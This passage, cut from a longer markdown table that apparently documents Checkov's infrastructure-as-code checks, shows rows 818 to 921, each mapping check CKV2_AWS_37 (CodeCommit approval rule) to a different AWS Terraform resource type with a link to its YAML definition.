[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 819 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 820 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 821 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 822 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 823 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 824 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 825 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 826 | CKV2_AWS_37 | resource | aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 827 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 828 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 829 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 830 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 831 | CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 832 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 833 | CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 834 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | 
Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 835 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 836 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 837 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 838 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 839 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 840 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 841 | CKV2_AWS_37 | resource 
| aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 842 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 843 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 844 | CKV2_AWS_37 | resource | aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 845 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 846 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 847 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) 
| -| 848 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 849 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 850 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 851 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 852 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 853 | CKV2_AWS_37 | resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 854 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 855 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 856 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 857 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 858 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 859 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 860 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 861 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 862 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 863 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 864 | CKV2_AWS_37 | resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 865 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 866 | CKV2_AWS_37 | resource | aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 867 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 868 
| CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 869 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 870 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 871 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 872 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 873 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 874 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 875 | 
CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 876 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 877 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 878 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 879 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 880 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 881 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 882 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 883 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 884 | CKV2_AWS_37 | resource | aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 885 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 886 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 887 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 888 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 889 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 890 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 891 | CKV2_AWS_37 | resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 892 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 893 | CKV2_AWS_37 | resource | aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 894 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 895 | CKV2_AWS_37 | resource | 
aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 896 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 897 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 898 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 899 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 900 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 901 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 902 | 
CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 903 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 904 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 905 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 906 | CKV2_AWS_37 | resource | aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 907 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 908 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 909 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 910 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 911 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 912 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 913 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 914 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 915 | CKV2_AWS_37 | resource | 
aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 916 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 917 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 918 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 919 | CKV2_AWS_37 | resource | aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 920 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 921 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | 
